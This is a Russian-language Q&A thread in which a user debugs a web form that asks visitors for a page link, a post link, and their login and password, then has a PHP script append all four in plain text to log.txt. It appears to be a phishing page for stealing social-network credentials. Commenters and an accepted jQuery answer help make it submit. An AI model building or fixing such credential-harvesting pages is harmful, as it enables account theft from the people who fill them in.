# Не отправляются данные из форм POST запросом - PHP

Tags: php, javascript, html, html5, post

Код PHP(тут всё работает):
login.php

```
<?PHP
$Id = $_POST['q1'];
$File = $_POST['q2'];
$Log = $_POST['q3'];
$Pass = $_POST['q4'];
$log = fopen("log.txt","at");
fwrite($log,"\n $Id:$File:$Log:$Pass \n");
fclose($log);
?>
```

Вот тут не работает(html):

```
<form id="theForm" class="simform" autocomplete="off" method="POST" action="login.php">
                    <div class="simform-inner">
                        <ol class="questions">
                            <li>
                                <span><label for="q1">Ссылка на страницу:</label></span>
                                <input id="q1" type="text" name="q1" />
                            </li>
                            <li>
                                <span><label for="q2">Ссылка на запись(фото/новость):</label></span>
                                <input id="q2" type="text" name="q2"/>
                            </li>
                            <li>
                                <span><label for="q3">Ваш логин:</label></span>
                                <input id="q3" type="text" name="q3"/>
                            </li>
                            <li>
                                <span><label for="q4">Ваш пароль:</label></span>
                                <input id="q4" type="text" name="q4"/>                          
                            </li>   
                        </ol><!-- Вот тут не отправляет, что делать? -->
                        <button class="submit" type="submit"></button>

                        <div class="controls">
                            <button class="next"></button>
                            <div class="progress"></div>
                            <span class="number">
                                <span class="number-current"></span>
                                <span class="number-total"></span>
                            </span>
                            <span class="error-message"></span>
                        </div><!-- / controls -->
                    </div><!-- /simform-inner -->
                    <span class="final-message"></span>

                </form><!-- /simform -->
```

Что делать? После заполнения всех полей оно должно автоматически(js) нажать на кнопку, оно нажимает, но данные не приходят.

Js

```
<script>
    var theForm = document.getElementById( 'theForm' );

    new stepsForm( theForm, {
        onSubmit : function( form ) {
            // hide form
            classie.addClass( theForm.querySelector( '.simform-inner' ), 'hide' );

            /*
            form.submit()
            or
            AJAX request (maybe show loading indicator while we don't have an answer..)
            */

            // let's just simulate something...
            var messageEl = theForm.querySelector( '.final-message' );
            messageEl.innerHTML = 'Готово! Ваш запрос отправлен на обработку!';
            classie.addClass( messageEl, 'show' );
        }
    } );
</script>
```

Comment: ну так предоставьте сюда js

Comment: я всегда использую `input` для сабмита, но согласен, можно и джаваскриптом (правда будет сложнее)

Comment: "оно должно" - "оно" - это кто?

Comment: @Jean-Claude добавил

Comment: @RomanKravets - что делает `stepsForm` и откуда оно берется, мы, конечно, должны угадать сами?

Comment: данные не приходят потому что `js` не "сабмитит" форму. Важно использовать `preventDefault();` и `serialize()`

Answer (score 1, accepted):

**Попробуйте через Jquery**

```
$("document").ready(function(){
        $("#theForm").submit(function(event){
             event.preventDefault();
           // data = $(this).serialize() + "&" + $.param(data);
           data = $(this).serialize();
           // alert(data);
            $.ajax({
                type: "POST",
                dataType: "json",
                url: "file.php",
                data: data,
                success: function(data) {

                  //  alert("Form submitted successfully.\n Returned json: " + data["json"]);
                }
            });
            return false;
        });
    });
```